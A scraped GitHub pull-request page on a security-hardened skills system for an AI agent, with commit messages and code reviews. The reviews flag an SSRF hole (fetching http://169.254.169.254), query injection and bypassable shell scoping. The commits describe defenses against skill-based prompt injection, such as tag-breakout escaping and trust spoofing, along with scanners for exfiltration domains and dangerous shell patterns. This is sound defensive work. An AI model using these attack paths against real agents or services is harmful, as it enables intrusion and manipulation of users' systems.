…te trust Replace the 5-gate, 3-tier trust hierarchy (scanner, behavioral analyzer, parameter-level enforcer, HTTP endpoint scoping) with a simplified 3-layer security model: gating -> attenuation -> Docker confinement. Key changes: - SKILL.md format (YAML frontmatter + markdown prompt) replaces skill.toml + prompt.md - 2-state trust (Installed/Trusted) replaces 3-tier (Community/Verified/Local) - New parser.rs for SKILL.md parsing with serde_yaml - New gating.rs for requirements checking (bins/env/config) - Simplified registry with 2-location discovery (workspace + user dirs) - Removed scanner, behavioral_analyzer, enforcer, http_scoping (~4,100 lines) - Removed skill_permissions propagation through job/orchestrator/worker pipeline - Added serde_yaml dependency for YAML frontmatter parsing Net: -5,298 lines, 59 skills tests pass, 907 total tests pass. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Add 4 chat-callable tools (skill_list, skill_search, skill_install, skill_remove) plus matching web gateway endpoints for managing skills at runtime. The catalog fetches from ClawHub's public registry API at runtime rather than bundling entries at compile time. Key changes: - SkillRegistry gains mutation methods (install_skill, remove_skill, reload, find_by_name) with Arc<RwLock> for concurrent access - New catalog module queries ClawHub /api/v1/search with in-memory caching (5-min TTL, configurable via CLAWHUB_REGISTRY env var) - skill_list and skill_search added to READ_ONLY_TOOLS for safe use under Installed trust ceiling - Web gateway gets /api/skills, /api/skills/search, /api/skills/install, and /api/skills/{name} DELETE endpoints Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

# Conflicts: # src/agent/agent_loop.rs # src/main.rs

ilblackdragon

Code Review: feat: Secure prompt-based skills system (Phases 1-4)

This is a well-architected skills system with strong security fundamentals. The 2-state trust model, authority attenuation, structural isolation via XML tags, and deterministic selection are all excellent design choices. The code quality across the new src/skills/ module is high -- good documentation, comprehensive tests, and thoughtful security hardening.

However, there are several issues that should be addressed before merge, ranging from security concerns to correctness bugs.

Security Issues

1. SSRF risk in skill_install and web gateway install handler (HIGH)

Both fetch_skill_content() in src/tools/builtin/skill_tools.rs and the skills_install_handler in src/channels/web/server.rs accept arbitrary user-provided URLs and fetch them with no validation. An attacker (or a manipulated LLM) could use this to probe internal network services:

// skill_tools.rs line 291
} else if let Some(url) = params.get("url").and_then(|v| v.as_str()) {
    fetch_skill_content(url).await?  // Any URL, including http://169.254.169.254/...

The web gateway handler duplicates this pattern with a raw reqwest::Client::builder() that also has no URL validation. At minimum, validate that the URL scheme is https and that the host is not a private/loopback/link-local IP address before fetching. Consider also restricting to the configured CLAWHUB_REGISTRY domain for catalog-based installs.

2. skill_download_url does not URL-encode the slug (MEDIUM)

In src/skills/catalog.rs line 224:

pub fn skill_download_url(registry_url: &str, slug: &str) -> String {
    format!("{}/api/v1/download?slug={}", registry_url, slug)
}

The slug is interpolated directly into the URL without URL-encoding. A slug containing & or # characters could alter the query structure. Use urlencoding::encode() or reqwest's built-in query parameter handling.

3. Web gateway skill install/remove endpoints lack authorization beyond bearer token (LOW)

The skills_install_handler and skills_remove_handler in the web gateway do not require tool approval like their chat-tool counterparts do. The chat tools correctly have requires_approval() -> true, but the HTTP endpoints bypass this. An attacker with a stolen gateway token could install arbitrary skills. Consider adding an explicit admin-only check or requiring a confirmation step for the web API endpoints.

Correctness Issues

4. std::sync::RwLock held across block_in_place + block_on (HIGH)

In src/tools/builtin/skill_tools.rs (lines 302-321 for install, lines 422-432 for remove), the code acquires a std::sync::RwLock write guard and then calls tokio::task::block_in_place(|| { tokio::runtime::Handle::current().block_on(...) }) while still holding the lock. This is fragile:

The block_in_place call converts the current tokio worker thread to a blocking thread, and the block_on re-enters the runtime. While this technically works, it holds a synchronous write lock across potentially long I/O (filesystem writes in install_skill, filesystem deletes in remove_skill). Any other task that tries to read the registry during this time will block its tokio worker thread (since it's a std::sync::RwLock, not tokio::sync::RwLock).
The comment on lines 309-316 acknowledges this problem but dismisses it as "acceptable because install is rare." However, select_active_skills is called on every incoming message and also takes a read lock. Under concurrent load, a slow install could starve message processing.

Consider either: (a) switching to tokio::sync::RwLock so reads can await without blocking worker threads, (b) performing the async I/O outside the lock and only holding it briefly for the in-memory mutation, or (c) using a message-passing pattern (channel) to serialize mutations.

5. serde_yaml is deprecated (MEDIUM)

The Cargo.toml adds serde_yaml = "0.9", which is officially deprecated (the lockfile even shows version = "0.9.34+deprecated"). The maintained replacement is serde_yml (by the same author). Since this is a new dependency being introduced, it should start on the maintained fork to avoid accumulating tech debt.

6. toml dependency added but unused (LOW)

Cargo.toml adds toml = "0.8" with the comment "TOML parsing for skill manifests", but the actual SKILL.md format uses YAML frontmatter, not TOML. I don't see any toml:: usage in the skills code. This appears to be leftover from an earlier design iteration and should be removed.

Design Feedback

7. Token estimation uses byte length, not word count

In src/skills/registry.rs line 313 and src/skills/selector.rs line 77:

let approx_tokens = (prompt_content.len() as f64 * 0.75) as usize;

This estimates tokens as 0.75x the byte count. The comment in selector.rs says "~0.75 tokens per byte for English prose," but standard estimates are ~0.75 tokens per word (or ~4 characters per token, i.e., ~0.25 tokens per byte). The current formula significantly overestimates token counts (by ~3x), which means skills will be rejected by the token budget check or budget-limited earlier than intended. Either correct the formula or add a comment explaining the intentional conservatism.

8. Duplicate HTTP client construction in web gateway install handler

The skills_install_handler in src/channels/web/server.rs constructs a new reqwest::Client for each request (twice -- once for URL fetch, once for catalog fetch). Consider reusing the SkillCatalog's client or storing a shared client in GatewayState.

9. Installed skills written with original content, not normalized

In src/skills/registry.rs line 399:

tokio::fs::write(&skill_path, content).await // writes original content

But line 368 normalizes line endings:

let normalized = normalize_line_endings(content);

The parsed/validated content uses the normalized version, but the file written to disk uses the original. This means the content hash (computed from normalized content after re-parsing from disk) will differ from what was validated, and CRLF line endings will persist on disk. Write the normalized content instead.

10. discover_from_dir uses let-chains (unstable feature?)

Lines 216-219 of registry.rs use let-chains in if let:

if meta.is_file()
    && let Some(fname) = path.file_name().and_then(|f| f.to_str())
    && fname == "SKILL.md"

This is a nightly feature that was stabilized in Rust 1.87. If the project targets stable Rust < 1.87, this won't compile. Same pattern appears in agent_loop.rs for skill activation. Verify the MSRV is compatible or refactor to nested if blocks.

Minor / Nits

skill_tools.rs line 456: dir.keep() leaks the temp directory in tests. Consider using dir.path().to_path_buf() and keeping dir alive with let _dir = dir; instead.
The SkillSearchTool acquires the registry read lock twice (once for installed names, once for local matches at line 194). These could be combined into a single lock acquisition.
src/tools/builtin/job.rs has a 1-line change (line diff shows +1/-1) that seems unrelated to skills -- is this intentional?
Consider adding the SKILLS_ENABLED, SKILLS_DIR, etc. env vars to .env.example and CLAUDE.md configuration docs.

Summary

The core skills architecture is sound and the security model is well thought out. The main blockers are the SSRF risk in URL fetching (items 1-2), the sync lock held across async I/O (item 4), and the deprecated serde_yaml dependency (item 5). After addressing these, this is ready to merge.

Security: - Add SSRF protection to fetch_skill_content: require HTTPS, reject private/loopback/link-local IPs and internal hostnames, disable redirects. Gateway install handler now reuses the same validation. - URL-encode slug in skill_download_url to prevent query injection. - Require X-Confirm-Action header on gateway skill install/remove endpoints (equivalent to chat tool requires_approval gate). Correctness: - Eliminate all block_in_place/block_on usage in skill tools and gateway handlers. Split install into prepare_install_to_disk (static async, no lock) + commit_install (sync, brief write lock). Same pattern for remove: validate_remove + delete_skill_files + commit_remove. - Write normalized content to disk in install_skill (was writing original un-normalized content, causing hash mismatch on re-read). - Fix token estimation from 0.75 to 0.25 tokens/byte (~4 chars per token) in registry.rs, selector.rs, and standalone loader. Dependencies: - Replace deprecated serde_yaml 0.9 with serde_yml 0.0.12. - Remove unused toml dependency. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

zmanian · 2026-02-17T14:41:43Z

Review feedback addressed in `93f68f5`

Worked through all open items from @ilblackdragon's review.

Security

#	Issue	Resolution
1	SSRF in `fetch_skill_content` and gateway install handler	Added `validate_fetch_url()` -- requires HTTPS, rejects private/loopback/link-local IPs, rejects `localhost`/`.internal`/`.local` hostnames, disables redirect following. Gateway install handler now reuses the same function instead of inline `reqwest::Client` construction. 8 new tests.
2	`skill_download_url` doesn't URL-encode slug	Now uses `urlencoding::encode(slug)`. Added test for special characters.
3	Gateway install/remove bypass tool approval	Both endpoints now require `X-Confirm-Action: true` header, returning 400 without it.

Correctness

#	Issue	Resolution
4	`std::sync::RwLock` held across `block_in_place`+`block_on`	All `block_in_place`/`block_on` eliminated. Install split into `prepare_install_to_disk` (static async method, no lock needed) + `commit_install` (sync, brief write lock). Remove split into `validate_remove` (read lock) + `delete_skill_files` (static async) + `commit_remove` (brief write lock).
5	`serde_yaml` is deprecated	Replaced with `serde_yml = "0.0.12"` in Cargo.toml and all import sites.
6	Unused `toml` dependency	Removed from Cargo.toml.
9	Installed skills written with original content, not normalized	`prepare_install_to_disk` now writes normalized content so the hash matches on re-read.

Design

#	Issue	Resolution
7	Token estimation uses 0.75 tokens/byte (3x overestimate)	Fixed to 0.25 tokens/byte (~4 chars per token) in `registry.rs`, `selector.rs`, and the new standalone loader.
8	Duplicate `reqwest::Client` in gateway install handler	Gateway now calls the shared `fetch_skill_content()` (also gets SSRF protection for free).
10	`let-chains` requires Rust 1.87+	Non-issue: project MSRV is 1.92, current toolchain is 1.93.

Verification

cargo fmt -- clean
cargo clippy --all --benches --tests --examples --all-features -- clean
cargo test -- 951 passed, 0 failed
cargo check (default features) -- clean
cargo check --no-default-features --features libsql -- clean

Merge origin/main into feat/skills-phase2. Main brought: - Agent loop refactor: split into dispatcher, thread_ops, commands, cost_guard - Benchmarking harness with spot suite - 10 infrastructure improvements (tunnels, observability, circuit breaker) - Cheap LLM provider for lightweight tasks Re-applied skills system changes to new architecture: - SkillsConfig added to Config struct - skill_registry + skills_config fields in AgentDeps - select_active_skills() method on Agent - Skill context building + tool attenuation in dispatcher - Benchmark runner updated for new AgentDeps fields Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

addressed

* feat: Add secure prompt-based skills system (Phase 1 MVP) Implement a skills system that extends the agent with prompt-level instructions from local directories. Skills declare activation criteria, tool permissions, and trust tiers that determine authority attenuation. Core security model: the minimum trust level of any active skill determines a tool ceiling -- tools above the ceiling are removed from the LLM's tool list entirely at the API level, preventing prompt-based manipulation. New modules: - skills/mod.rs: Core types (SkillTrust, SkillManifest, LoadedSkill) - skills/scanner.rs: Content scanner for manipulation detection - skills/registry.rs: Filesystem discovery and manifest parsing - skills/selector.rs: Deterministic two-phase prefilter (no LLM) - skills/attenuation.rs: Trust-based tool filtering Integration: - Agent loop selects skills per-turn and applies tool attenuation - Reasoning engine injects skill context with structural isolation - Config supports SKILLS_ENABLED, SKILLS_DIR, SKILLS_MAX_ACTIVE, SKILLS_MAX_CONTEXT_TOKENS environment variables - Disabled by default (SKILLS_ENABLED=false) 41 new tests covering all modules. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: Address all adversarial review findings for skills system Security fixes: - Escape skill name/version in XML attributes to prevent trust spoofing - Escape prompt content to prevent </skill> tag breakout - Require integrity hash for Verified/Community tier skills - Validate skill names against [a-zA-Z0-9][a-zA-Z0-9._-]{0,63} - Add 64 KiB file size limit on prompt.md Bug fixes: - Use actual SkillsConfig from AgentDeps instead of SkillsConfig::default() - Add skills_config field to AgentDeps, wired through from main.rs Performance: - Pre-compile regex patterns at load time (cached on LoadedSkill) - Selector uses pre-compiled patterns instead of recompiling per message - Switch all std::fs to tokio::fs for non-blocking async I/O Hardening: - Cap keyword score at 30 points to prevent keyword stuffing attacks - Enforce max 20 keywords and 5 patterns per skill - Normalize line endings (CRLF/CR to LF) before hashing - Also includes cargo fmt formatting fixes for adjacent code Tests: 54 skills tests pass (up from 41), zero new clippy warnings. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: Address medium/low severity findings from adversarial review Fixes all 18 medium/low severity findings identified by the security review: - mod.rs: Add MAX_TAGS_PER_SKILL cap (10) in enforce_limits(); use RegexBuilder with 64 KiB size_limit to prevent ReDoS; replace case-enumerated escape_skill_content with regex matching all case variants plus whitespace/null byte injection between </ and skill; document allowed_patterns as unenforced until Phase 2; document Marketplace URL validation as Phase 3 concern - registry.rs: Add MAX_MANIFEST_FILE_SIZE (16 KiB) check before reading; add symlink detection via symlink_metadata to reject symlinks in discover_local; add MAX_DISCOVERED_SKILLS (100) cap; validate prompt_hash format (sha256: + 64 hex chars); warn on name collision before overwriting; accept SkillSource parameter in load_skill instead of always using Local; add InvalidHashFormat, ManifestTooLarge, SymlinkDetected error variants - selector.rs: Add MAX_TAG_SCORE (15) cap parallel to keyword cap; warn when declared max_context_tokens diverges >2x from actual prompt size - scanner.rs: Add mixed-script homoglyph detection (Cyrillic, Greek, Armenian unicode ranges); document token-boundary bypass and semantic paraphrasing as known limitations - attenuation.rs: Document READ_ONLY_TOOLS maintenance requirements - agent_loop.rs: Surface scan warnings via structured tracing; add structured audit events for skill activation and tool attenuation 61 tests pass, 0 new clippy warnings. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: Address 12 findings from second adversarial security review HIGH: - Escape opening <skill tags in prompt content (prevents fake skill block injection) - Scan manifest metadata fields (description, author, tags, reasons) not just prompt - Block trust downgrade on name collision (existing Local can't be replaced by Community) MEDIUM: - Eliminate TOCTOU gap: read files then check size instead of metadata-then-read - Reject file-level symlinks in load_skill (prompt.md, skill.toml) - Truncate and filter manifest.skill.tags (prevent unlimited tag scoring) - Cap regex pattern score at 40 (prevent 5x20=100 dominating keyword+tag) - Add doc comment about skill_list tool exposing metadata (sanitization required) - Move Community disclaimer inside <skill> tags (not outside structural boundary) - Filter keywords/tags shorter than 3 chars (prevent broad matching) LOW: - Enforce minimum token_cost of 1 (max_context_tokens=0 can't bypass budget) - Remove redundant try_exists checks in discover_local (let load_skill handle errors) 70 skills tests passing. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: Add HTTP endpoint scoping for skills (Phase 1) Skills that declare an [http] section in skill.toml now have their HTTP requests constrained to declared endpoints at runtime. This addresses the gap where allowed_patterns was parsed but never enforced -- once the http tool was visible via attenuation, the LLM could reach any URL. Enforcement reuses EndpointPattern/AllowlistValidator from the WASM capability system. Semantics: if no active skill declares [http], all requests pass through (backward compat). If any skill declares [http], URLs must match at least one skill's allowlist (union). Community skills' [http] declarations are silently ignored (defense in depth). Shell commands using curl/wget are also validated against scopes. Scanner gains detection for known exfiltration domains (webhook.site, ngrok.io, etc.), overly broad wildcards, and credential/host mismatches. Closes nearai#38 Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * style: Apply cargo fmt to http_scoping.rs Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * style: Apply cargo fmt across codebase Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: Add parameter-level permission enforcement for skills (Phase 2) Activates enforcement of `allowed_patterns` in skill.toml permissions. Previously these patterns were parsed but not enforced -- a Verified skill declaring `permissions.shell` with `allowed_patterns = [{command = "cargo *"}]` could still run any shell command. Now the enforcer validates tool parameters against declared glob patterns before execution. Key changes: - New `enforcer.rs` module with `SkillPermissionEnforcer`, `glob_to_regex()`, and `validate_tool_call()` with union semantics across active skills - Typed pattern enums (`ShellPattern`, `FilePathPattern`, `MemoryTargetPattern`) replace the previous `Vec<serde_json::Value>` in `ToolPermissionDeclaration` - Scanner gains `scan_permission_patterns()` detecting dangerous patterns (rm, sudo, curl, bare wildcards, command chaining, sensitive paths, identity files) - Registry blocks non-Local skills with critical permission pattern warnings - Agent loop threads enforcer into `execute_chat_tool` alongside HTTP scoping Trust interaction: Community patterns ignored, Verified enforced, Local without patterns unrestricted, Local with patterns enforced as guidance. Union semantics across skills -- tool call allowed if ANY skill's patterns permit it. 34 new tests. All 818 library tests pass. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: Add worker permission enforcement and LLM behavioral analysis (Phase 3+4) Phase 3 - Worker-side permission enforcement: - Add SerializedToolPermission/SerializedPattern DTOs for HTTP boundary crossing - Extend JobDescription, ContainerHandle, and orchestrator API to carry permissions - CreateJobTool snapshots and forwards skill permissions to spawned workers - Worker runtime builds SkillPermissionEnforcer and checks before tool execution - Load-time token budget enforcement rejects prompts exceeding 2x declared budget - Deduplicate enforcer construction: from_active_skills() delegates to from_serialized() Phase 4 - LLM behavioral analysis: - BehavioralAnalyzer with cached, LLM-based semantic content analysis - Structured output parsing (FINDING|CATEGORY|SEVERITY|DESCRIPTION or CLEAN) - Content-hash caching with bounded size (MAX_CACHE_ENTRIES=256) - Graceful degradation when LLM unavailable - Integrated into load_skill() for non-Local skills; critical findings block loading Review fixes: - Real cache tests with CountingLlm mock (test_cache_hit, test_cache_miss, test_cache_bounded) - UTF-8-safe truncate() in worker runtime - Few-shot examples in behavioral analysis prompt - Documented max_context_tokens=0 opt-out and create_job() permission gap 848 tests passing, no new clippy warnings. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: Address review feedback from serrrfirat on skills-phase2 - Fix truncate_cmd UTF-8 panic: use char-boundary-aware slicing - Remove redundant effective_tools branching in reasoning.rs - Document cache eviction as known limitation (arbitrary, not LRU) - Add safety comment on SkillTrust enum ordering (security-critical) - Simplify active_skills selection (prefilter_skills handles empty input) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address remaining skills review feedback * refactor: replace skills system with OpenClaw SKILL.md format + 2-state trust Replace the 5-gate, 3-tier trust hierarchy (scanner, behavioral analyzer, parameter-level enforcer, HTTP endpoint scoping) with a simplified 3-layer security model: gating -> attenuation -> Docker confinement. Key changes: - SKILL.md format (YAML frontmatter + markdown prompt) replaces skill.toml + prompt.md - 2-state trust (Installed/Trusted) replaces 3-tier (Community/Verified/Local) - New parser.rs for SKILL.md parsing with serde_yaml - New gating.rs for requirements checking (bins/env/config) - Simplified registry with 2-location discovery (workspace + user dirs) - Removed scanner, behavioral_analyzer, enforcer, http_scoping (~4,100 lines) - Removed skill_permissions propagation through job/orchestrator/worker pipeline - Added serde_yaml dependency for YAML frontmatter parsing Net: -5,298 lines, 59 skills tests pass, 907 total tests pass. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: add in-app skill management tools and ClawHub catalog integration Add 4 chat-callable tools (skill_list, skill_search, skill_install, skill_remove) plus matching web gateway endpoints for managing skills at runtime. The catalog fetches from ClawHub's public registry API at runtime rather than bundling entries at compile time. Key changes: - SkillRegistry gains mutation methods (install_skill, remove_skill, reload, find_by_name) with Arc<RwLock> for concurrent access - New catalog module queries ClawHub /api/v1/search with in-memory caching (5-min TTL, configurable via CLAWHUB_REGISTRY env var) - skill_list and skill_search added to READ_ONLY_TOOLS for safe use under Installed trust ceiling - Web gateway gets /api/skills, /api/skills/search, /api/skills/install, and /api/skills/{name} DELETE endpoints Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address PR nearai#51 review feedback from ilblackdragon Security: - Add SSRF protection to fetch_skill_content: require HTTPS, reject private/loopback/link-local IPs and internal hostnames, disable redirects. Gateway install handler now reuses the same validation. - URL-encode slug in skill_download_url to prevent query injection. - Require X-Confirm-Action header on gateway skill install/remove endpoints (equivalent to chat tool requires_approval gate). Correctness: - Eliminate all block_in_place/block_on usage in skill tools and gateway handlers. Split install into prepare_install_to_disk (static async, no lock) + commit_install (sync, brief write lock). Same pattern for remove: validate_remove + delete_skill_files + commit_remove. - Write normalized content to disk in install_skill (was writing original un-normalized content, causing hash mismatch on re-read). - Fix token estimation from 0.75 to 0.25 tokens/byte (~4 chars per token) in registry.rs, selector.rs, and standalone loader. Dependencies: - Replace deprecated serde_yaml 0.9 with serde_yml 0.0.12. - Remove unused toml dependency. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>

zmanian and others added 10 commits February 11, 2026 17:21

merge: incorporate DM pairing changes from main

69c349b

Merge main to pick up PR nearai#17 (DM pairing + Telegram channel improvements) before shipping skills system PR. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

style: Apply cargo fmt to http_scoping.rs

4720166

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

style: Apply cargo fmt across codebase

664947c

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

zmanian mentioned this pull request Feb 12, 2026

Design: Secure Prompt-Based Skills System #38

Closed

gemini-code-assist Bot reviewed Feb 12, 2026

View reviewed changes

serrrfirat previously requested changes Feb 13, 2026

View reviewed changes

zmanian and others added 2 commits February 13, 2026 07:22

merge: Resolve conflicts with main

97256ac

Take main's security hardening, shared util::floor_char_boundary, and improved error handling over branch-local implementations. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

fix: address remaining skills review feedback

714103b

Merge remote-tracking branch 'origin/main' into feat/skills-phase2

5a9a4e2

# Conflicts: # Cargo.lock # src/agent/agent_loop.rs # src/config.rs # src/tools/builtin/job.rs # src/tools/registry.rs

zmanian mentioned this pull request Feb 17, 2026

RFC: Simplify skills system - adopt OpenClaw SKILL.md format + Docker confinement #120

Open

zmanian and others added 3 commits February 16, 2026 21:47

Merge remote-tracking branch 'origin/main' into feat/skills-phase2

d640eb8

# Conflicts: # src/agent/agent_loop.rs # src/main.rs

ilblackdragon mentioned this pull request Feb 17, 2026

feat: Add secure prompt-based skills system with HTTP scoping #39

Closed

6 tasks

ilblackdragon requested changes Feb 17, 2026

View reviewed changes

ilblackdragon approved these changes Feb 18, 2026

View reviewed changes

ilblackdragon merged commit bac2d75 into nearai:main Feb 18, 2026
2 checks passed

github-actions Bot mentioned this pull request Feb 17, 2026

chore: release v0.6.0 #136

Merged

Conversation

zmanian commented Feb 12, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Summary

Phase 1: OpenClaw SKILL.md format + 2-state trust

Phase 2: In-app skill management + ClawHub catalog

Key security properties

Files changed

Test plan

Uh oh!

gemini-code-assist Bot commented Feb 12, 2026

Summary of Changes

Highlights

Footnotes

Uh oh!

gemini-code-assist Bot left a comment

Choose a reason for hiding this comment

Code Review

Uh oh!

gemini-code-assist Bot Feb 12, 2026

Choose a reason for hiding this comment

Uh oh!

zmanian Feb 15, 2026

Choose a reason for hiding this comment

Uh oh!

gemini-code-assist Bot Feb 12, 2026

Choose a reason for hiding this comment

Uh oh!

zmanian Feb 15, 2026

Choose a reason for hiding this comment

Uh oh!

serrrfirat left a comment

Choose a reason for hiding this comment

PR #51 Review: feat: Secure prompt-based skills system (Phases 1-4)

Summary

Verdict: REQUEST_CHANGES

P0 — Critical Security Issues

1. User-approved tool calls bypass ALL enforcement (agent_loop.rs ~L1868)

2. Shell HTTP scoping is trivially bypassable (http_scoping.rs)

3. Glob pattern is_valid_pattern_char allows space but not |, &, ; — but doesn't prevent command injection in shell patterns (enforcer.rs)

P1 — Correctness Bugs

4. truncate_cmd in http_scoping.rs can panic on multi-byte UTF-8

5. Behavioral analyzer cache eviction is random (behavioral_analyzer.rs ~L108)

6. Redundant tool attenuation code path in reasoning.rs

P2 — Design Concerns

7. Mixed trust drops to lowest — may be too aggressive

8. Keyword scoring can be gamed by choosing common words

9. No rate limiting on behavioral analyzer LLM calls

P3 — Nits / Style

Strengths

Uh oh!

tribendu commented Feb 15, 2026

Summary

Pros

Concerns

Suggestions

Uh oh!

zmanian commented Feb 15, 2026

Uh oh!

zmanian commented Feb 15, 2026

Uh oh!

zmanian commented Feb 17, 2026

Uh oh!

ilblackdragon left a comment

Choose a reason for hiding this comment

Code Review: feat: Secure prompt-based skills system (Phases 1-4)

Security Issues

Correctness Issues

Design Feedback

Minor / Nits

Summary

Uh oh!

zmanian commented Feb 17, 2026

Review feedback addressed in 93f68f5

Security

Correctness

Design

Verification

Uh oh!

Uh oh!

zmanian commented Feb 12, 2026 •

edited

Loading

3. Glob pattern `is_valid_pattern_char` allows space but not `|`, `&`, `;` — but doesn't prevent command injection in shell patterns (enforcer.rs)

4. `truncate_cmd` in http_scoping.rs can panic on multi-byte UTF-8

Review feedback addressed in `93f68f5`